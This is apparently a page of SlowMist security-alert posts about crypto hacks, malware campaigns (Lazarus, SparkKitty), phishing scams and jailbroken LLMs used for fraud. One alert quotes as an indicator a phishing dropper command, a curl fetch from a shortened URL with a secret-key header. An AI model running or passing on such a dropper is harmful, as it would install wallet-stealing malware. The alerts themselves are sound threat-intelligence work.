Binance Square

SlowMist_Team

🚨SlowMist TI Alert🚨

Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi , with losses of approximately $5.59M.

The attacker manipulated the cvcrvUSD exchange rate by making donations to the cvcrvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.

As always, stay vigilant!
🚨SlowMist TI Alert🚨

Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi , with losses of approximately $5.59M.

The attacker manipulated the cvcrvUSD exchange rate by making donations to the crvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.

As always, stay vigilant!
🚨 SlowMist TI Alert 🚨

A new malware named #SparkKitty that steals all photos from infected iOS & Android devices — searching for crypto wallet seed phrases.

⚠️ Delivered via:
🔸 "币coin" (App Store)
🔸 "SOEX" (Google Play, 10K+ installs, now removed)
🔸 Casino apps, adult games, TikTok clones

🌍 Mainly targeting users in Southeast Asia & China, but no regional limits.

🛡️ Key tips:
🔹 Don't install unknown apps
🔹 Avoid APK sideloading
🔹 Use antivirus tools

Stay alert! (Source: @kaspersky)
💰Over $50B USDT in deposits and $50B in withdrawals flowed through HuionePay in the past 18 months — now under global regulatory scrutiny for allegedly receiving, moving, and cashing out scam funds (mostly via USDT on TRON).

We dug into the data with @MistTrack_io and built a Dune dashboard to map its on-chain footprint.

📊Dashboard: https://t.co/DHKtY3X9th
✍️Report: https://t.co/O6uWC2S1qU

#TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
🚨 Security TI Alert 🚨

According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. $120/hour) to trick them into executing a malicious script that steals wallet files.

🔍 Key IOCs:
🔸GitLab repo: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 The attack method is very similar to the previous Lazarus use of NPM packages to spread malicious code:
https://t.co/bBC4i2vYpA

🚨 We found that a new malicious NPM package was just published:
https://t.co/SjgmO1FOIL
🔸Likely linked GitHub: apollo-hero
🔸Uploader email: [email protected]

⚠️ Do NOT install or run unknown packages or scripts. Always verify sources.

#LAZARUS #Phishing
🚨SlowMist TI Alert🚨

MistEye has detected potential suspicious activities related to the @Bankroll_Status .

As always, stay vigilant!

https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
🚨SlowMist Security Alert🚨

We have detected potential suspicious activities related to @meta_pool. The root cause is that the _deposit function has been rewritten, enabling arbitrary minting through the mint function without the need to transfer tokens.

As always, stay vigilant!
🚨 SlowMist Security Alert🚨

‼️Beware of a new threat from the LAZARUS APT group — #OtterCookie info-stealer malware is targeting professionals in the finance and crypto industries.

🎯 Attack tactics:
🔹Posing as reputable companies with fake interviews or investment pitches
🔹Using deepfakes to impersonate interviewers/investors in video calls
🔹Tricking victims into running malware disguised as coding challenges or video app updates
🔹Once executed, OtterCookie steals sensitive data silently

🕵️‍♂️ Targets include:
🔹Browser-stored credentials
🔹macOS Keychain passwords & certificates
🔹Locally stored crypto wallet info & private keys

🛡️ Stay safe:
🔹Verify all unsolicited job/investment offers
🔹Never run unknown binaries, especially “challenges” or “updates”
🔹Use anti-virus software and monitor for abnormal behaviors

📚 Read more about #APT:

https://t.co/hyzwQoiu23

cc @im23pds
🚨SlowMist Security Alert🚨

SlowMist recently received intelligence indicating that the Lazarus APT group is using a new stealer called OtterCookie in targeted attacks on crypto & finance pros.

🎭Tactics:
- Fake job interviews/investor calls
- Deepfake videos to impersonate recruiters
- Malware disguised as “coding challenges” or “updates”

😈Steals:
- Browser-stored login credentials
- Passwords & certificates from macOS Keychain
- Wallet info & private keys

🛡️Security Recommendations:
🔹Treat unsolicited job/investment offers and remote interviews with caution.
🔹Never run unknown binaries, especially if presented as “technical challenges” or “update packages.”
🔹Enhance EDR capabilities and monitor for abnormal activity. Use antivirus tools and regularly audit your endpoints.

⚠️Stay safe — always verify before you trust.

#Lazarus #APT #OtterCookie #CryptoSecurity
⚠️As AI races forward, a darker side emerges: Unrestricted Large Language Models.

Unlike mainstream LLMs with built-in safety guards, these "jailbroken" or deliberately modified models are designed to bypass ethical restrictions—enabling phishing, malware generation, and fraud.

In this article, we explore the rise of tools like WormGPT, FraudGPT, and GhostGPT, their abuse in the crypto space, and the growing security challenges they pose.

Read the full analysis👇
https://t.co/yt1r95mlP4

#AI #Cybersecurity #LLM #Phishing #Malware
🚨 SlowMist Security Alert🚨

The Android banking trojan #Crocodilus is now targeting crypto users and banking apps globally after recent upgrades.

⚠️ Key threats:

🔹Spreads via fake browser updates in Facebook ads
🔹Steals login credentials using overlay attacks
🔹Extracts crypto wallet seed phrases & private keys
🔹Injects fake "bank support" numbers into contact lists
🔹Malware-as-a-Service: Available for rent (100–300 USDT/attack)

📵 Avoid unknown app updates & ad links.

Stay alert! (Source: @ThreatFabric)
🚨May 2025 Web3 Security Recap🚨

📊According to SlowMist’s Hacked (https://t.co/e90CSvTm6B):
⚠️15 hacks ➡️ ~$257M lost
❄️~$162M recovered/frozen

🎣Phishing losses via @realScamSniffer:
7,164 victims ➡️ ~$9.6M stolen

Major incidents:
• Cetus Protocol lost $230M in a math overflow attack
• Cork Protocol exploited for $12M+ due to insufficient validation of user-supplied data
• BitoPro lost $11.5M; funds laundered via Tornado Cash, Thorchain, and Wasabi
• Demex lost $950K from an oracle manipulation targeting a deprecated vault
• Zunami Protocol lost $500K; root cause under investigation

Security Highlights:
⚠️Contract vulnerabilities caused 95% of total hack losses
🎭Account takeovers surged again
😈Lazarus Group is now targeting individuals—one victim lost $5.2M to malware

✍️Full report:
🚨Scam Warning

We recently assisted a user who encountered a suspicious tool claiming his wallet had a “risky authorization.” The tool prompted him to paste his private key to resolve the issue.

After investigation, we identified the site—signature[.]land—as a phishing platform. The site has also been flagged as malicious by Web3 anti-scam platform @realScamSniffer.

Key findings:
♦️UI mimics the legitimate Revoke tool
♦️Risk results are fabricated for any input
♦️All user input is sent directly to: abpulimali@gmail[.]com

The operator behind this site, @Titanspace3, employs multiple deceptive tactics:
🎭Uses @zachxbt’s avatar on Telegram
🎭Poses as a SlowMist employee
🎭Runs a 74K-follower X account, frequently commenting under crypto users’ posts, falsely claiming their wallets are at risk and directing them to a phishing link disguised as a “security tool.”

Scam flow:
1⃣Fabricate panic around “risky approvals”
2⃣Lure victims into using a phishing site
3⃣Instruct them to input private keys for “revocation”

🛡️Recommendations
– Never paste your private key into any website
– Only use security tools from verified, official sources
– Stay vigilant and follow a zero-trust mindset

For a full breakdown of this case, see our latest article:
https://t.co/IvrVPrT6Su

#Phishing #Crypto #Web3 #Scam #SocialEngineering #Revoke
🎉 SlowMist x Foresight News Dragon Boat Festival Giveaway 🎉

Your mnemonic phrase is the lifeline of your crypto — keep it safe, keep it in mind. 🧠⛓️

@Foresight_News just dropped a cool new collectible, we're giving away 3 to the community!

To enter:
1⃣ Follow @Foresight_News & @SlowMist_Team
2⃣ Like + RT this tweet & tag 3 friends

Winners announced: June 4 🎁

Good luck to everyone!🤩
🚨SlowMist Security Alert🚨

We detected potential suspicious activity related to @Corkprotocol.

As always, stay vigilant!
🚨SlowMist Security Alert🚨

☠️Recently, multiple users have reported receiving SMS messages from "well-known exchanges", saying:

🎭"Your withdrawal verification code is xxx. If you did not request this transaction, call xxx immediately for assistance."

📱Once you call back, you're told it's a “security breach” and are connected to someone claiming to be from “hardware wallet support.”

🎣They guide you to a phishing site and trick you into entering your mnemonic phrase — resulting in cold wallet thefts worth over $1 million.

⚠️Scammers know you trust exchanges — and they exploit that trust to trick you, step by step.

We recently disclosed a similar case — check out our detailed write-up to strengthen your awareness and defenses:
https://t.co/OLGtlY1HBV

Remember:
🔒Never share your mnemonic phrase.
🚫Don’t trust unexpected calls, texts, or links. Always verify via official sources.

#Web3Security #PhishingAlert #ColdWallet #CryptoScam #SocialEngineering
In recent years, Coinbase users have repeatedly become targets of social engineering attacks — and on May 15, Coinbase confirmed insider involvement.

How it works:

📞 Fake support call
📲 Walk user through Coinbase Wallet
⚠️ Provide scam mnemonic phrase
💸 Drain assets under stress & urgency

With @MistTrack_io, we traced the flows:

▪️ BTC bridged via THORChain / Chainflip / Defiway Bridge → DAI/USDT
▪️ ETH swapped on Uniswap → DAI/USDT
▪️ Funds laundered or still dormant

Full breakdown👇
https://t.co/OLGtlY2frt

#CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
🚨SlowMist Security Alert🚨

We detected potential suspicious activity related to @Nexo.

As always, stay vigilant!

https://bscscan.com/address/0x0851ae80e137c53a8dbc48fce82efd1f50f3b9f2
🚨SlowMist Scam Alert🚨

We’ve received reports of fake Telegram groups impersonating #SlowMist and scamming users via phishing investment links. One example: ❌t[.]me/slowmist1 — this is NOT us.‼️

✅ Please report such groups to Telegram immediately.

For your safety, always refer to our official channels:
1⃣Website: https://t.co/IO2VWk2pae
2⃣X: @SlowMist_Team & @MistTrack_io
3⃣Email: [email protected]

If in doubt, feel free to DM us directly.

⚠️Stay vigilant and verify before you trust.
🚀Big news! @MistTrack_io MCP is now live for testing!

You can now use natural language in #Claude, #Cursor, and other MCP-supported clients to call #MistTrack’s on-chain analysis APIs — from address profiling & risk scoring to fund flow graphs.

🧐Smarter, faster, and easier blockchain investigations — powered by AI.

✍️In our latest post:
🔹What is MistTrack MCP
🔹How to use it
🔹Core features
🔹Real use case examples
https://t.co/Fvn2YZIuoI

👋Ready to explore the new AI paradigm for on-chain tracing? Start here:
https://t.co/UCDcC9Dt51

#Web3 #AI #BlockchainSecurity #MCP